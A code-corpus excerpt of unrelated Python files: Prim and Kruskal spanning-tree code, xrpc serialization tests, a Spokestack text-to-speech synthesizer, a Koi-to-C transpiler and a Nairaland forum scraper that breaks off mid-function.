- edges : a list of weighted edges (e.g. (0.7, 'A', 'B') for an
edge from node A to node B with weigth 0.7)
"""
edges = []
for v, adjacent_vertices in adj_list.items():
for w, u in adjacent_vertices:
edges.append((w, u, v))
return edges
def prim(vertices, edges, start, add_weights=False):
"""
Prim's algorithm for finding a minimum spanning tree.
Inputs :
- vertices : a set of the vertices of the Graph
- edges : a list of weighted edges (e.g. (0.7, 'A', 'B') for an
edge from node A to node B with weigth 0.7)
- start : an edge to start with
- add_weights : add the weigths to the edges? default: False
Output:
- edges : a minumum spanning tree represented as a list of edges
(weighted if `add_weights` is set to True)
- total_cost : total cost of the tree
"""
adj_list = edges_to_adj_list(edges)
to_check = [(w, start, v_new) for w, v_new in adj_list[start]]
heapq.heapify(to_check)
# for every node connected to the
#dist_to_mst = {i : (w, start) for w, i in adj_list.pop(start)}
mst_edges = []
mst_vertices = set([start])
total_cost = 0
while to_check:
cost, v_in_mst, v_new = heapq.heappop(to_check)
if v_new not in mst_vertices:
# add to mst
if add_weights:
mst_edges.append((cost, v_in_mst, v_new))
else:
mst_edges.append((v_in_mst, v_new))
mst_vertices.add(v_new)
total_cost += cost
for cost, v in adj_list[v_new]:
heapq.heappush(to_check, (cost, v_new, v))
return mst_edges, total_cost
def kruskal(vertices, edges, add_weights=False):
"""
Kruskal's algorithm for finding a minimum spanning tree.
Inputs :
- vertices : a set of the vertices of the Graph
- edges : a list of weighted edges (e.g. (0.7, 'A', 'B') for an
edge from node A to node B with weigth 0.7)
- add_weights : add the weigths to the edges? default: False
Output:
- edges : a minumum spanning tree represented as a list of edges
(weighted if `add_weights` is set to True)
- total_cost : total cost of the tree
"""
union_set_forest = USF(vertices)
edges = list(edges) # might be saved in set format...
edges.sort()
mst_edges = []
total_cost = 0
for cost, v1, v2 in edges:
if union_set_forest.find(v1) != union_set_forest.find(v2):
if add_weights:
mst_edges.append((cost, v1, v2))
else:
mst_edges.append((v1, v2))
union_set_forest.union(v1, v2)
total_cost += cost
del union_set_forest
return mst_edges, total_cost
if __name__ == '__main__':
"""
words = ['maan', 'laan', 'baan', 'mama', 'saai', 'zaai', 'naai', 'baai',
'loon', 'boon', 'hoon', 'poon', 'leem', 'neem', 'peen', 'tton',
'haar', 'haar', 'hoor', 'boor', 'hoer', 'boer', 'loer', 'poer']
hamming = lambda w1, w2 : sum([ch1 != ch2 for ch1, ch2 in zip(w1, w2)])
edges = [(hamming(w1, w2), w1, w2) for w1 in words
for w2 in words if w1 is not w2]
tree = kruskal(words, edges)
print(tree)
import networkx
g = networkx.Graph()
g.add_edges_from(tree)
labels = {n:n for n in g.nodes()}
networkx.draw(g, networkx.spring_layout(g))
# draw maze
import numpy as np
size = 50
M = np.random.randn(size, size)
vertices = [(i, j) for i in range(size) for j in range(size)]
edges = [(abs(M[i1, j1] - M[i2, j2]), (i1, j1), (i2, j2)) for i1,
j1 in vertices for i2, j2 in vertices if abs(i1-i2) +
abs(j1-j2) == 1 if (i1, j1) != (i2, j2)]
maze_links = kruskal(vertices, edges)
import matplotlib.pyplot as plt
fig, ax = plt.subplots(figsize=(10,10))
ax.set_axis_bgcolor('black')
for (i1, j1), (i2, j2) in maze_links:
ax.plot([i1, i2], [j1, j2], c='white', lw=5)
fig.savefig('maze.pdf')
"""
import json
import matplotlib.pyplot as plt
with open('Data/example_graph.json', 'r') as fp:
example_graph = json.load(fp)
coordinates = example_graph['coordinates']
edges = example_graph['edges']
vertices = set([i for d, i, j in edges])
edges_kruskal, cost_kruskal = kruskal(vertices, edges)
edges = example_graph['edges']
edges_prim, cost_prim = prim(vertices, edges, 1)
for d, i, j in edges:
xi1, xi2 = coordinates[i]
xj1, xj2 = coordinates[j]
plt.plot([xi1, xj1], [xi2, xj2], color='grey', alpha=0.7, lw=2, zorder=1)
for i, j in edges_kruskal:
xi1, xi2 = coordinates[i]
xj1, xj2 = coordinates[j]
plt.plot([xi1, xj1], [xi2, xj2], color=red, lw=5, zorder=2)
for x1, x2 in coordinates:
plt.scatter(x1, x2, color=green, s=50, zorder=3)
plt.xticks([])
plt.yticks([])
plt.savefig('Figures/mst_example.png')
# make animations
fig, ax = plt.subplots()
anim = make_mst_animation(coordinates, edges, edges_kruskal, fig, ax)
anim.save('Figures/kruskal.gif', dpi=80, writer='imagemagick')
fig, ax = plt.subplots()
anim = make_mst_animation(coordinates, edges, edges_prim, fig, ax)
anim.save('Figures/prim.gif', dpi=80, writer='imagemagick')
| StarcoderdataPython |
3338634 | <filename>xrpc_tests/serde/test_generic.py
from typing import TypeVar, Generic
from dataclasses import dataclass
from xrpc.const import SERVER_SERDE_INST
from xrpc.serde.abstract import SerdeSet
from xrpc.serde.error import SerdeException
from xrpc.serde.types import CallableArgsWrapper, CallableRetWrapper
from xrpc_tests.mp.abstract import ProcessHelperCase
T = TypeVar('T')
@dataclass
class Obj(Generic[T]):
i: T = 0
class Runner(Generic[T]):
def method(self, a: int, b: str) -> T:
pass
def method2(self, a: int, b: T) -> bool:
pass
def build_worker_serde():
a = SerdeSet.walk(SERVER_SERDE_INST, Obj[int])
s = a.merge(a)
return s.struct(SERVER_SERDE_INST)
def dir_items(x):
for n in dir(x):
yield n, getattr(x, n)
class TestGeneric(ProcessHelperCase):
def test_pickle_0(self):
WorkerSerde = build_worker_serde()
# import pickle
# pickle.dumps(WorkerSerde)
WorkerSerde.deserialize(Obj[int], {'i': 5})
WorkerSerde.serialize(Obj[int], Obj(5))
def test_pickle_1(self):
WorkerSerde = build_worker_serde()
# import pickle
# pickle.dumps(WorkerSerde)
x = WorkerSerde.deserialize(Obj[int], {'i': 5})
y = WorkerSerde.serialize(Obj[int], Obj(5))
def test_generic_method(self):
fa = CallableArgsWrapper.from_func_cls(Runner[int], Runner.method2)
a = SerdeSet.walk(
SERVER_SERDE_INST,
fa
)
xo = [(5, 7), {}]
x = a.struct(SERVER_SERDE_INST).serialize(fa, xo)
y = a.struct(SERVER_SERDE_INST).deserialize(fa, xo)
self.assertEqual(x, y)
try:
a.struct(SERVER_SERDE_INST).serialize(fa, [(5, 'asd'), {}])
except SerdeException as e:
self.assertEqual('asd', e.resolve().val)
self.assertEqual('int', e.resolve().kwargs['t'])
def test_generic_method_ret(self):
fa = CallableRetWrapper.from_func_cls(Runner[int], Runner.method)
a = SerdeSet.walk(
SERVER_SERDE_INST,
fa
)
xo = 8
x = a.struct(SERVER_SERDE_INST).serialize(fa, xo)
y = a.struct(SERVER_SERDE_INST).deserialize(fa, xo)
self.assertEqual(x, y)
try:
a.struct(SERVER_SERDE_INST).serialize(fa, 'str')
except SerdeException as e:
self.assertEqual('str', e.resolve().val)
self.assertEqual('int', e.resolve().kwargs['t'])
| StarcoderdataPython |
3273722 | <gh_stars>100-1000
"""
Spokestack-Lite Speech Synthesizer
This module contains the SpeechSynthesizer class used to convert text to speech
using local TTS models trained on the Spokestack platform. A SpeechSynthesizer
instance can be passed to the TextToSpeechManager for playback.
Example:
This example assumes that a TTS model was downloaded from the Spokestack
platform and extracted to the :code:`model` directory. ::
from spokestack.io.pyaudio import PyAudioOutput
from spokestack.tts.manager import TextToSpeechManager, FORMAT_PCM16
from spokestack.tts.lite import SpeechSynthesizer, BLOCK_LENGTH, SAMPLE_RATE
tts = TextToSpeechManager(
SpeechSynthesizer("./model"),
PyAudioOutput(sample_rate=SAMPLE_RATE, frames_per_buffer=BLOCK_LENGTH),
format_=FORMAT_PCM16)
tts.synthesize("Hello world!")
"""
import importlib
import json
import os
import re
import typing as T
from collections import defaultdict
import numpy as np
from spokestack.models.tensorflow import TFLiteModel
# signal configuration
SAMPLE_RATE = 24000
HOP_LENGTH = 240
ENCODER_PAD = -2
BREAK_LENGTH = 0.1
# streaming/cross-fading configuration
FRAME_LENGTH = 63
FRAME_OVERLAP = 1
BLOCK_LENGTH = FRAME_LENGTH * HOP_LENGTH
BLOCK_OVERLAP = FRAME_OVERLAP * HOP_LENGTH
FADE_OUT = np.linspace(1, 0, BLOCK_OVERLAP, dtype=np.float32)
FADE_IN = FADE_OUT[::-1]
class SpeechSynthesizer:
"""
Initialize a new lightweight speech synthesizer
Args:
model_path (str): Path to the extracted TTS model downloaded from the
Spokestack platform
"""
def __init__(self, model_path: str):
# load NLP configuration
self._lexicon = _load_lexicon(os.path.join(model_path, "lexicon.txt"))
with open(os.path.join(model_path, "metadata.json")) as file:
metadata = json.load(file)
lang = metadata["language"]
self._sym_to_id = {s: i for i, s in enumerate(metadata["alphabet"])}
self._language: T.Any = importlib.import_module(f"spokestack.tts.lite.{lang}")
self._nlp = self._language.nlp()
# load the TTS models
self._aligner = TFLiteModel(os.path.join(model_path, "align.tflite"))
self._encoder = TFLiteModel(os.path.join(model_path, "encode.tflite"))
self._decoder = TFLiteModel(os.path.join(model_path, "decode.tflite"))
self._aligner_input_index = self._aligner.input_details[0]["index"]
self._encoder_input_index = self._encoder.input_details[0]["index"]
def synthesize(
self, utterance: str, *_args: T.List, **_kwargs: T.Dict
) -> T.Iterator[np.array]:
"""
Synthesize a text utterance to speech audio
Args:
utterance (str): The text string to synthesize
Returns:
Iterator[np.array]: A generator for returns a sequence of
PCM-16 numpy audio blocks for playback, storage, etc.
"""
# segment sentences into a list of phoneme/grapheme lists
for tokens in self._parse(utterance):
# convert tokens to a vector of ids
inputs = self._vectorize(tokens)
# run the aligner model
self._aligner.resize(self._aligner_input_index, inputs.shape)
inputs = self._aligner(inputs)[0]
# run the encoder model
self._encoder.resize(self._encoder_input_index, inputs.shape)
encoded = self._encoder(inputs)[0]
# stream the decoder model and cross-fade the output audio
overlap = np.zeros([BLOCK_OVERLAP], dtype=np.float32)
for i in range(FRAME_OVERLAP, len(encoded), FRAME_LENGTH):
# decode the current frame, padding as need to fill the decoder's input
inputs = encoded[i - FRAME_OVERLAP : i + FRAME_LENGTH]
inputs = np.pad(
inputs,
[(0, (FRAME_LENGTH + FRAME_OVERLAP) - len(inputs)), (0, 0)],
"constant",
constant_values=ENCODER_PAD,
)
outputs = self._decoder(inputs)[0]
# fade in the new block, convert to int16 and return it
overlap += outputs[:BLOCK_OVERLAP] * FADE_IN
block = np.hstack([overlap, outputs[BLOCK_OVERLAP:-BLOCK_OVERLAP]])
yield (block * (2 ** 15 - 1)).astype(np.int16)
# fade out the previous block for mixing with the next block
overlap = outputs[-BLOCK_OVERLAP:] * FADE_OUT
# add a break after each segment
yield np.zeros([int(BREAK_LENGTH * SAMPLE_RATE)], dtype=np.int16)
def _parse(self, text: str) -> T.Iterator[str]:
# perform language-specific number conversions, abbreviation expansions, etc.
text = self._language.clean(text)
# escape characters used for phonetic substitution
text = re.sub(r"{", "[", text)
text = re.sub(r"}", "]", text)
# segment and tokenize the text, and convert words to their phonetic
# representations using the attached lexicon
for sentence in self._nlp(text).sents:
tokens = []
for token in sentence:
if token.pos_ in ["SYM", "PUNCT"]:
tokens.append(token.text_with_ws)
else:
entry = self._lexicon.get(token.text.lower(), {})
ipa = entry.get(token.tag_, entry.get(None))
tokens.append(
f"{{{ipa}}}{token.whitespace_}" if ipa else token.text_with_ws
)
yield re.sub(r"}\s+{", " ", "".join(tokens))
def _vectorize(self, text: str) -> np.array:
# start with bos token
vector = [self._sym_to_id["^"]]
while text:
# check for curly braces and treat their contents as ipa
matches = re.match(r"(.*?)\{(.+?)\}(.*)", text)
# no ipa in this block, vectorize graphemes
if not matches:
vector.extend(self._vectorize_text(text))
break
# ipa found, vectorize leading text, then phones
vector.extend(self._vectorize_text(matches.group(1)))
vector.extend(self._vectorize_phones(matches.group(2)))
text = matches.group(3)
# append eos token
vector.append(self._sym_to_id["~"])
return np.array(vector, dtype=np.int32)
def _vectorize_text(self, text: T.Union[str, T.List[str]]) -> T.List[int]:
return [
self._sym_to_id[c] for c in text if c in self._sym_to_id and c not in "_^~"
]
def _vectorize_phones(self, phones: str) -> T.List[int]:
return self._vectorize_text([f"@{c}" if c != " " else c for c in phones])
def _load_lexicon(path: str) -> T.Dict[str, T.Dict[T.Optional[str], str]]:
lexicon: T.Dict[str, T.Dict[T.Optional[str], str]] = defaultdict(dict)
with open(path, "r") as file:
for line in file:
# parse the the lexicon entry, discard any alternative pronunciations
parts = line.strip().split("\t")
if len(parts) > 1:
word = parts[0].lower()
ipa = parts[1].split(",")[0].strip()
pos = parts[2] if len(parts) > 2 else None
lexicon[word][pos] = ipa
return lexicon
| StarcoderdataPython |
3201071 | <gh_stars>1-10
import pathlib
import os
from typing import TextIO
from .gen.KoiParser import KoiParser
from .gen.KoiListener import KoiListener
from .sanitize import type_to_c, extract_name, extract_comparisons, extract_paramaters
class KoiTranspiler(KoiListener):
def __init__(self, file: TextIO = None, transpile_locally: bool = True):
# TODO: Change to use the Koi file name
# TODO: Create an associating header
if not file:
pathlib.Path("out").mkdir(exist_ok=True)
self.file = open("out/main.c", "w")
else:
self.file = file
self.transpile_locally = transpile_locally
# Enviroment variables:
# SOY_HOME = A folder named "Soy". This is used to house the Soy install.
# SOY_LIB = A folder in SOY_HOME, called "lib". This is used to house the core and standard libraries for Soy/Koi.
self.file_contents = []
self.current_line = []
self.current_name = ""
self.secondary_name = ""
self.current_class = []
self.variable_dict = {}
self.class_vars = []
self.all_names = []
self.define_name = ""
self.imports = []
self.in_class = False
self.class_id = 0
self.class_name = None
self.in_class_init = False
self.init_place = None
self.quit_function = False
self.points = []
self.loop_name = "index"
self.instance_name = "instance"
def exitProgram(self, ctx:KoiParser.ProgramContext):
for core in ["stdio.h", "limits.h", "stdbool.h", "stddef.h"]:
self.file.write(f"#include <{core}>\n")
# for name in self.all_names:
# self.file.write(f"#undef {name}\n")
for import_ in self.imports:
self.file.write(import_)
if self.define_name != "":
self.file_contents.append([f"\n#define {self.define_name}", "\n#endif"])
self.define_name = ""
self.file.write(" ".join(" ".join(line) for line in self.file_contents))
self.file.close()
def exitLine(self, ctx:KoiParser.LineContext):
# self.file.write(" ".join(self.current_line))
self.file_contents.append(self.current_line)
self.current_line = []
def enterName(self, ctx:KoiParser.NameContext):
if ctx.getText() not in self.all_names:
if type(ctx.parentCtx) in [KoiParser.Function_blockContext, KoiParser.Procedure_blockContext, KoiParser.Enum_blockContext]:
self.define_name = ctx.getText().upper() + "_EXISTS"
self.current_line.insert(0, f"#ifndef {self.define_name}\n")
self.all_names.append(ctx.getText())
if ctx.THIS():
self.current_name = "*" + self.instance_name
else:
self.current_name = ctx.getText()
def enterBlock(self, ctx:KoiParser.BlockContext):
if type(ctx.parentCtx) is not KoiParser.Class_blockContext and type(ctx.parentCtx) is not KoiParser.Init_blockContext:
self.current_line.append("{")
if type(ctx.parentCtx) is KoiParser.For_blockContext:
self.current_line.append(self.secondary_name)
self.current_line.append("=")
self.current_line.append(self.current_name)
self.current_line.append("[")
self.current_line.append(self.loop_name)
self.current_line.append("]")
self.current_line.append(";")
def exitBlock(self, ctx:KoiParser.BlockContext):
if type(ctx.parentCtx) is not KoiParser.Class_blockContext and type(ctx.parentCtx) is not KoiParser.Init_blockContext:
self.current_line.append("}")
def enterImport_stmt(self, ctx:KoiParser.Import_stmtContext):
# TODO: Transpile imported Koi files and store the output in a temporary location then link to that instead
path = os.environ.get("SOY_LIB")
if ctx.CORE():
path += "\\core"
elif ctx.STANDARD():
path += "\\std"
for d in ctx.package_name().folders:
path += "\\" + d.text
last_path = path + "\\" + ctx.package_name().last.text
if os.path.isdir(last_path):
pass
# for f in os.listdir(last_path):
# if f.endswith("c"):
# # TODO: Package/namespace imports
# self.current_line.append("#include")
# self.current_line.append("\"{}\"\n".format((last_path + "\\" + f).replace("\\", "\\\\")))
elif os.path.isfile(last_path + ".koi"):
# A file for C exists with the same name, must be a native thing ¯\_(ツ)_/¯
# TODO: Change this to acknowledge a native function if there is one, and have that point to the C file
if os.path.isfile(last_path + ".c"):
path += "\\" + ctx.package_name().last.text + ".c"
# There's no C file, it must be a Koi file
else:
if self.transpile_locally:
new_path = "\\".join(path.split("\\")[0:-1]) + "\\" + path.split("\\")[-1] + "\\_compiled"
pathlib.Path(new_path).mkdir(exist_ok=True)
else:
new_path = "out"
newest_path = new_path + "\\" + ctx.package_name().last.text + ".c"
if not os.path.isfile(newest_path):
with open(newest_path, "w") as comp_file:
from .transpile import transpile_file
transpile_file(path + "\\" + ctx.package_name().last.text + ".koi", comp_file)
path = comp_file.name
else:
path = newest_path
import_path = "#include"
# self.current_line.append("#include")
if self.transpile_locally:
# self.current_line.append("\"{}\"\n".format(path.replace("\\", "\\\\")))
import_path += "\"{}\"\n".format(path.replace("\\", "\\\\"))
else:
# self.current_line.append("\"{}\"\n".format("".join(path.split("\\")[1:])))
import_path += "\"{}\"\n".format("".join(path.split("\\")[1:]))
self.imports.append(import_path)
def enterFunction_block(self, ctx:KoiParser.Function_blockContext):
self.current_line.append(ctx.returnType.getText())
self.current_name = ctx.name().getText()
if self.in_class:
self.current_name = self.secondary_name + "_" + self.current_name
self.current_line.append(self.current_name)
def enterProcedure_block(self, ctx:KoiParser.Procedure_blockContext):
self.current_line.append("void")
self.current_name = ctx.name().getText()
if self.in_class:
self.current_name = self.secondary_name + "_" + self.current_name
self.current_line.append(self.current_name)
def enterParameter_set(self, ctx:KoiParser.Parameter_setContext):
self.current_line.append("(")
params = []
for i in ctx.parameter():
params.append(i.name().getText())
if self.in_class:
self.current_line.append("const")
self.current_line.append(self.secondary_name)
self.current_line.append("*")
self.current_line.append(self.instance_name)
if len(params) > 0:
self.current_line.append(",")
for p in ctx.parameter():
self.current_line.append(type_to_c(p.type_().getText()))
self.current_line.append(p.name().getText())
if "[]" in p.type_().getText():
self.current_line.append("[]")
if params.index(p.name().getText()) < len(params) - 1:
self.current_line.append(",")
def exitParameter_set(self, ctx:KoiParser.Parameter_setContext):
self.current_line.append(")")
def enterReturn_stmt(self, ctx:KoiParser.Return_stmtContext):
self.current_line.append("return")
if ctx.true_value().value().getText() == "this":
self.current_line.append("*" + self.instance_name)
else:
self.current_line.append(ctx.true_value().getText())
self.current_line.append(";")
def enterFunction_call(self, ctx:KoiParser.Function_callContext):
# print(ctx.getText(), self.variable_dict)
# if ctx.funcName.getText() in ["print", "println"]:
# self.current_line.append("printf")
# else:
# self.current_line.append(ctx.funcName.getText())
class_call = False
if self.quit_function:
self.quit_function = False
return
if type(ctx.parentCtx) is KoiParser.ValueContext:
return
for c in ctx.method_call():
name = c.funcName.getText()
if self.variable_dict.get(name.split(".")[0]):
class_call = True
if class_call:
split = name.split(".")
class_name = split[0]
name = self.variable_dict[class_name] + "_" + name.split(".")[-1]
self.current_line.append(name)
params = extract_paramaters(c.call_parameter_set(), True)
if class_call:
params.insert(1, " ".join(["&" + class_name, ","]))
for p in params:
self.current_line.append(p)
self.current_line.append(";")
# if ctx.funcName.getText() == "println":
# self.current_line.append("printf")
# self.current_line.append("(")
# self.current_line.append("\"\\n\"")
# self.current_line.append(")")
# self.current_line.append(";")
def enterFor_block(self, ctx:KoiParser.For_blockContext):
# FIXME: Fix in-line lists
self.current_name = ctx.name()[0].getText()
self.current_line.append("int")
self.current_line.append(self.loop_name)
self.current_line.append(";")
self.current_line.append(type_to_c(ctx.type_().getText()))
self.current_line.append(self.current_name)
self.current_line.append(";")
self.current_line.append("for")
self.current_line.append("(")
self.current_line.append(self.loop_name)
self.current_line.append("=")
self.current_line.append("0")
self.current_line.append(";")
self.current_line.append(self.loop_name)
self.current_line.append("<")
self.current_line.append("sizeof")
self.current_line.append("(")
if ctx.with_length() is None:
size = ctx.name()[1].getText()
else:
size = ctx.with_length().getText()
self.current_line.append(size)
self.secondary_name = ctx.name()[0].getText()
self.current_line.append(")")
self.current_line.append("/")
self.current_line.append("sizeof")
self.current_line.append("*")
self.current_line.append("(")
self.current_line.append(size)
self.current_line.append(")")
self.current_line.append(";")
self.current_line.append(self.loop_name)
self.current_line.append("++")
self.current_line.append(")")
def enterLocal_asstmt(self, ctx:KoiParser.Local_asstmtContext):
assignment = []
my_type = ""
if ctx.type_():
assignment.append(type_to_c(ctx.type_().getText()))
self.variable_dict[ctx.name().getText()] = type_to_c(ctx.type_().getText())
my_type = ctx.type_().getText()
assignment.append(extract_name(ctx.name().getText(), my_type, self.instance_name))
if ctx.true_value():
if ctx.true_value().value().function_call():
self.quit_function = True
if ctx.true_value().value().class_new():
self.class_name = ctx.name().getText()
assignment.append(";")
else:
if ctx.type_() and "[]" in ctx.type_().getText():
assignment.append("[]")
assignment.append("=")
# if ctx.true_value().value().function_call():
# assignment.append("=")
# assignment.append(ctx.true_value().getText().replace("this.", self.instance_name + "->"))
if ctx.true_value().getText().startswith("["):
assignment.append("{")
assignment.append(extract_name(ctx.true_value().getText()[1:-1], my_type))
assignment.append("}")
else:
if not ctx.true_value().value().class_new():
assignment.append("=")
assignment.append(extract_name(ctx.true_value().getText(), my_type))
assignment.append(";")
if self.in_class_init:
assignment.append(";")
self.class_vars.append(" ".join(assignment))
self.current_class.insert(self.init_place, " ".join(assignment).split("=")[0] + ";")
else:
self.current_line.append(" ".join(assignment))
def exitLocal_asstmt(self, ctx:KoiParser.Local_asstmtContext):
if not self.in_class_init:
self.current_line.append(";")
def enterIf_block(self, ctx:KoiParser.If_blockContext):
self.current_line.append("if")
# self.current_line.append("(")
for i in extract_comparisons(ctx.compa_list(), True):
self.current_line.append(i)
# self.current_line.append(")")
def enterElf_block(self, ctx:KoiParser.Elf_blockContext):
self.current_line.append("else")
self.current_line.append("if")
# self.current_line.append("(")
for i in extract_comparisons(ctx.compa_list(), True):
self.current_line.append(i)
# self.current_line.append(")")
def enterElse_block(self, ctx:KoiParser.Else_blockContext):
self.current_line.append("else")
def enterClass_block(self, ctx:KoiParser.Class_blockContext):
self.current_class.append("typedef")
self.current_class.append("struct")
self.current_class.append("{")
self.init_place = len(self.current_class)
self.current_class.append("}")
self.current_class.append(ctx.name().getText())
self.current_class.append(";")
self.secondary_name = ctx.name().getText()
self.in_class = True
def exitClass_block(self, ctx:KoiParser.Class_blockContext):
self.in_class = False
def enterConstructor_block(self, ctx:KoiParser.Constructor_blockContext):
self.current_line.append("void")
self.current_line.append(self.secondary_name + "_new")
def enterClass_new(self, ctx:KoiParser.Class_newContext):
# TODO: Pass returned information to the next chained method
if self.class_name:
instance_name = self.class_name
else:
self.current_line.append(ctx.className.getText())
instance_name = "c" + str(self.class_id)
self.current_line.append("c" + str(self.class_id))
self.current_line.append(";")
self.class_id += 1
self.current_line.append(ctx.className.getText() + "_init" + "(&" + instance_name + ")")
self.current_line.append(";")
self.current_line.append(ctx.className.getText() + "_new" + "(&" + instance_name + ")")
self.current_line.append(";")
for c in ctx.method_call():
self.current_line.append(ctx.className.getText() + "_" + c.getText().split("(")[0] + "(&" + instance_name + "," + "".join(extract_paramaters(c.call_parameter_set(), False)) + ")")
self.current_line.append(";")
def enterInit_block(self, ctx:KoiParser.Init_blockContext):
self.in_class_init = True
def exitInit_block(self, ctx:KoiParser.Init_blockContext):
self.current_line.append(" ".join(self.current_class))
self.current_line.append("void")
self.current_line.append(self.secondary_name + "_init")
self.current_line.append("(")
self.current_line.append(self.secondary_name)
self.current_line.append("*")
self.current_line.append(self.instance_name)
self.current_line.append(")")
self.current_line.append("{")
new_vars = []
for i in self.class_vars:
split = i.replace("*", "").split(" ")
new_vars.append(self.instance_name)
new_vars.append("->")
new_vars.append(" ".join(split[1:-1]))
new_vars.append(";")
self.current_line.append(" ".join(new_vars))
self.current_line.append("}")
self.current_class = []
self.in_class_init = False
def enterWhen_block(self, ctx:KoiParser.When_blockContext):
self.current_line.append("switch")
self.current_line.append("(")
self.current_line.append(ctx.true_value().getText())
self.current_line.append(")")
self.current_line.append("{")
def exitWhen_block(self, ctx:KoiParser.When_blockContext):
self.current_line.append("}")
def enterIs_block(self, ctx:KoiParser.Is_blockContext):
self.current_line.append("case")
if ctx.half_compa():
if ctx.half_compa().comp.text == "<" or ctx.half_compa().comp.text == "<=":
self.current_line.append("INT_MIN")
self.current_line.append("...")
self.current_line.append(ctx.half_compa().getText().replace("<", "").replace("=", ""))
if "=" not in ctx.half_compa().comp.text:
self.current_line.append("-")
self.current_line.append("1")
elif ctx.half_compa().comp.text == ">" or ctx.half_compa().comp.text == ">=":
self.current_line.append(ctx.half_compa().getText().replace(">", "").replace("=", ""))
if "=" not in ctx.half_compa().comp.text:
self.current_line.append("+")
self.current_line.append("1")
self.current_line.append("...")
self.current_line.append("INT_MAX")
else:
self.current_line.append(ctx.true_value().getText())
self.current_line.append(":")
def exitIs_block(self, ctx:KoiParser.Is_blockContext):
self.current_line.append("break")
self.current_line.append(";")
def enterWhen_else(self, ctx:KoiParser.When_elseContext):
self.current_line.append("default")
self.current_line.append(":")
def exitWhen_else(self, ctx:KoiParser.When_elseContext):
self.current_line.append("break")
self.current_line.append(";")
def enterEnum_block(self, ctx:KoiParser.Enum_blockContext):
# TODO: Move enum values to their own "scope"
self.current_line.append("typedef")
self.current_line.append("enum")
self.current_line.append(ctx.name().getText())
self.current_line.append("{")
for i in ctx.ID():
if i.getText() not in self.all_names:
self.all_names.append(i.getText())
self.current_line.append(i.getText())
self.current_line.append(",")
self.current_line.append("}")
self.current_line.append(ctx.name().getText())
self.current_line.append(";")
def enterStruct_block(self, ctx:KoiParser.Struct_blockContext):
self.current_line.append("typedef")
self.current_line.append("struct")
self.current_line.append(ctx.name().getText())
self.current_line.append("{")
for i in ctx.struct_set():
self.current_line.append(type_to_c(i.type_().getText()))
self.current_line.append(i.name().getText())
self.current_line.append(";")
self.current_line.append("}")
self.current_line.append(ctx.name().getText())
self.current_line.append(";")
| StarcoderdataPython |
1799946 | <filename>nairaland/nairaland.py
from bs4 import BeautifulSoup
import dateparser
import requests
import lxml
class Nairaland:
def __init__(self, browser):
self.BASE_URL = "https://nairaland.com"
self.browser = browser
def front_page_topics(self):
soup = BeautifulSoup(requests.get(self.BASE_URL).text, "lxml")
td = soup.find('td', attrs={'class': 'featured w'})
links = td.find_all('a')
output = []
for link in links:
datum = {'url': link['href'], 'title': link.text}
split_list = datum['url'].split('/')
datum['id'] = split_list[3]
output.append(datum)
return {'data': output}
def categories(self, depth=0):
first_beautiful = BeautifulSoup(requests.get(self.BASE_URL).text, 'lxml')
table = first_beautiful.find('table', attrs={"class": "boards"})
links = table.find_all('a')
categories = []
browser = self.browser
for link in links:
if 'class=g' in link['title']:
datum = {
'url': self.BASE_URL+link['href'],
'name': link.text,
'id': browser.get_key_by_value(link.text),
'title': link['title'],
'sub_categories': [],
}
if depth > 0:
datum['title'] = datum['title'].replace('class=g', '')
# print('Nairaland: Visiting ', datum['url'])
browser.get_url(datum['url'])
second_table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
second_beautiful = BeautifulSoup(second_table.get_attribute('innerHTML'), 'lxml')
tds = second_beautiful.find_all('td')
sub_categories = []
total_topics = 0
for td in tds:
datum2 = {}
a = td.find('a')
datum2['url'] = self.BASE_URL+a['href']
datum2['name'] = a.text.strip()
text = td.text
resplit = text.split(':')[0]
datum2['title'] = resplit.split('(')[0]
datum2['topics'] = text[text.find('(') + 1: text.find(')')].replace(' topics','').strip()
try:
total_topics += int(datum2['topics'])
except:
pass
if depth > 1:
browser.get_url(datum2['url'])
third_table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
third_beautiful = BeautifulSoup(third_table.get_attribute('innerHTML'), 'lxml')
tds2 = third_beautiful.find_all('td')
child_sub_categories = []
child_total_topics = 0
for tdd in tds2:
ass = tdd.find_all('a')
for c in ass:
if 'href' not in c:
continue
else:
a = c
datum3 = {}
datum3['url'] = self.BASE_URL + a['href']
datum3['name'] = a.text.strip()
text = tdd.text
resplit = text.split(':')[0]
datum3['title'] = resplit.split('(')[0]
datum3['topics'] = text[text.find('(') + 1: text.find(')')].replace(' topics',
'').strip()
try:
child_total_topics += int(datum3['topics'])
total_topics += child_total_topics
except:
pass
child_sub_categories.append(datum3)
datum2['sub_categories'] = child_sub_categories
datum2['topics'] = child_total_topics
sub_categories.append(datum2)
datum['sub_categories'] = sub_categories
datum['topics'] = total_topics
categories.append(datum)
return {'data': categories}
def trending_topics(self, page=0):
url = self.BASE_URL+'/trending'
if page > 0:
url = url+'/'+str(page)
browser = self.browser
browser.get_url(url)
trending = {}
trending['meta'] = {}
pagination = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
links = table.find_elements_by_tag_name('tr')
anchors = pagination.find_elements_by_tag_name('a')
trending['meta'] = {}
if page < len(anchors):
trending['meta']['next_page'] = page + 1
else:
trending['meta']['next_page'] = page + 1
trending['meta']['page'] = page
trending['meta']['per_page'] = len(links)
if page > 0:
trending['meta']['previous_page'] = page - 1
else:
trending['meta']['previous_page'] = page
trending['meta']['total_pages'] = len(anchors)
trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
trending['data'] = []
for link in links:
datum = {}
beautiful = BeautifulSoup(link.get_attribute('innerHTML'), 'lxml')
bs = beautiful.find_all('b')
category = bs[0]
a = category.find('a')
datum['category'] = {}
datum['category']['url'] = self.BASE_URL+a['href']
datum['category']['name'] = a.text
topic = bs[1]
b = topic.find('a')
datum['title'] = b.text
datum['url'] = self.BASE_URL+b['href']
split_list = datum['url'].split('/')
datum['id'] = split_list[3]
span = beautiful.find('span')
bs = span.find_all('b')
creator = bs[0]
ac = creator.find('a')
datum['creator'] = {}
datum['creator']['name'] = ac.text
datum['creator']['url'] = self.BASE_URL+ac['href']
datum['posts'] = bs[1].text
datum['views'] = bs[2].text
datum['last_post_time'] = str(dateparser.parse(bs[3].text))
datum['last_post_creator'] = {}
ass = span.find_all('a')
if len(ass) > 1:
lc = ass[1]
datum['last_post_creator']['name'] = lc.text
datum['last_post_creator']['url'] = self.BASE_URL+lc['href']
whole_text = span.text
first_split = whole_text.split(' ')
